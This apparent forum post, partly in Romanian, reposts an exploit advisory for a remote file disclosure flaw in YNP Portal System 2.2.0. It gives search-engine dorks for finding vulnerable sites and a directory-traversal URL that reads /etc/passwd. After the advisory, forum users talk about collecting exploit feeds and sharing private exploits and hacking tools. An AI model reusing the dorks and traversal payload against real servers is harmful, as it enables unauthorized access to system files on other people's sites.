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[0DAY]YNP Portal System 2.2.0 <= Remote File Disclosure

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# Discovered by: GoLd_M = [Mahmood_ali] #
# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability #
# D0rk : inurl:"showpage.cgi?p=popsearch.html" #
# 0r : inurl:"showpage.cgi?p=support.html" #
# 0r : inurl:"showpage.cgi?p=dialup.html" #
# 0r : inurl:"showpage.cgi?p=" #
# POC: [url]http://site.com/showpage.cgi?p=../../../../../../etc/passwd[/url] #
# Thanx : Tryag.Com/cc , Asb-May.Net/bb , bd0rk , Cold Zero , All My Friends #

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eu trag rss-uri de la milworm, securitydot si alte cateva site-uri.

ieri am avut 10 noi.

sincer nu am mult timp ca sa postez. de abia am timp sa citesc ce mai apare pe aici.

gonzalez e cam leecher :)

dar e bine ca vine multa informatie aici.

Leecher? Vrei sa-ti postez exploituri si hacking tools private la vreme nu? ( postez si dinalea, dar nu are rost sa-mi stric reputatia )

Vezi-ti de drumul tau moubik!


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